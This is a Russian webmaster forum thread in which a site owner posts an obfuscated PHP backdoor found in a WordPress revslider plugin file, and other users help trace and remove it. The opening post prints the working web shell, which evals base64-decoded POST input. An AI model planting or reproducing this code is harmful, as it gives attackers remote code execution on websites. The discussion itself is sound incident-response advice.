Форум Сайтостроение Безопасность

Вирусы

12 3
psics
На сайте с 02.04.2009
Offline
130
psics
3290 

$sF="PCT4BA6ODSE_";

$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);



$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);

if (isset(${$s20}['n1c1ae6'])) {eval($s21(${$s20}['n1c1ae6']));}

$s21 = base64_decode;

$s20 = _POST;

if(isset($_POST['n1c1ae6'])){

eval(base64_decode($_POST['n1c1ae6']));

}

На сайте нашел такой код. Каспер при попытке открыть ругается. Похоже на вирус.

Я если правильно понимаю это код

То тут происходит выполнение того, что посылается в переменной n1c1ae6.

Как найти что приходит сюда и из какого файла? И файл у меня на хостинге или нет?

AlexVenga
На сайте с 10.04.2007
Offline
190
AlexVenga
#1

приходит через ПОСТ запрос от пользователя - у вас нигде не отображается)))

Смотрите логи доступа

Антикризисное предложение: [Бурж, AdSense] [NEW] Сайты - каталоги компаний с гарантией трафа [Дорого] (/ru/forum/1006462)
IL
На сайте с 20.04.2007
Offline
435
ivan-lev
#2
psics:
Как найти что приходит сюда и из какого файла? И файл у меня на хостинге или нет?

Сюда приходит из $_POST-запроса.

Всё что приходит - выполняется.

Чистить-сносить...

p.s. Создавать темы в правильном разделе

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
psics
На сайте с 02.04.2009
Offline
130
psics
#3
AlexVenga:
приходит через ПОСТ запрос от пользователя - у вас нигде не отображается)))
Смотрите логи доступа

что приходит через пост я и сам вижу. А с чего видно что от пользователя? а не из файла?

---------- Добавлено 25.12.2014 в 15:52 ----------

ivan-lev:
Сюда приходит из $_POST-запроса.
Всё что приходит - выполняется.
Чистить-сносить...
p.s. Создавать темы в правильном разделе

снесено, но надо ж дыру найти... Вот и пытаюсь узнать откуда ноги растут..

По поводу раздела - возможно и не правильно создал...

Найти и удалить все Монетизировать мобильный трафик? Ссылки, какие они!?
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#4
psics:
А с чего видно что от пользователя? а не из файла?

На это ответить смогут только логи доступа.

psics:
По поводу раздела - возможно и не правильно создал...

Да. Но уже исправлено ;)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
psics
На сайте с 02.04.2009
Offline
130
psics
#5

[24/Dec/2014:23:47:56 +0300] "POST /wp-content/old/plugins/woocommerce-custom-tabs/advanced-custom-fields/code.php HTTP/1.0" 404 151 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

вот тут еще одно обращение к одному файлу, но нету его кода, тоже похоже вирус.

Поиск по сайту тоталом со словом n1c1ae6 ничего не дал. Тогда вывод - с постороннего ресурса посылают запрос или зашифровано

302 вместо ожидавшейся 404 Сайт атакует вирус. Дистрибутив Стучатся боты..
ER
На сайте с 23.12.2014
Offline
3
erahost_ru
#6

Проверьте скрипты сайта через aibolit. На хостинге есть какие то антивирусы? Проверить файлы через maldet , avg... В каком месте сайта нашли вирус?

erahost.ru (http://erahost.ru) - хостинг на ssd от 1$, тестирование - 7 дней, домен - бесплатно.
psics
На сайте с 02.04.2009
Offline
130
psics
#7

wp-content/plugins/revslider/rs-plugin/assets/header.php

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#8
psics:
Поиск по сайту тоталом со словом n1c1ae6 ничего не дал. Тогда вывод - с постороннего ресурса посылают запрос или зашифровано

Не правильный вывод - нет взаимосвязи :) Не факт что нет виря, а сторонний ресурс или нет посылает ПОСТ тебе скажет ИП, который ты не показал строке лога (и показывать не нужно - просто сравни с ИП своего сервака).

Кроме того лучше получить само тело запроса. Оно тоже должно быть в логах, но для этого нужно повышать (или понижать - я не знаю как где будет правильно ;) ) уровень логирования

---------- Добавлено 25.12.2014 в 17:29 ----------

psics:
revslider

батенька, да он же больной. Ну т.е. его старые версии.

Get запросы в ajax Остановка счетчика Активность пользователя в DLE
ER
На сайте с 23.12.2014
Offline
3
erahost_ru
#9

недавно у одного клиента так же была проблема с этим же плагином.. revslider. похоже плагин уязвим. спама еще небыло с сайта? Установите самую новую версию плагина и проверьте все плагины на сайте. Например в моем случае вирь был еще в wp-content/plugins/backupwordpress/assets/ файлы diff.php menu.php , антивирусы их не брали. проверьте файлы сайта на последние изменения

Уязвимости в плагинах для Спрашиваем и отвечаем по Проблемы с Revolution Slider
A
На сайте с 20.08.2010
Offline
775
awasome
#10

Уже не одна тема про этот слайдер была. И вообще, зачем он нужен? Я раньше тоже рвался поставить, но с точки зрения удобства он никаких плюсов не дает.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий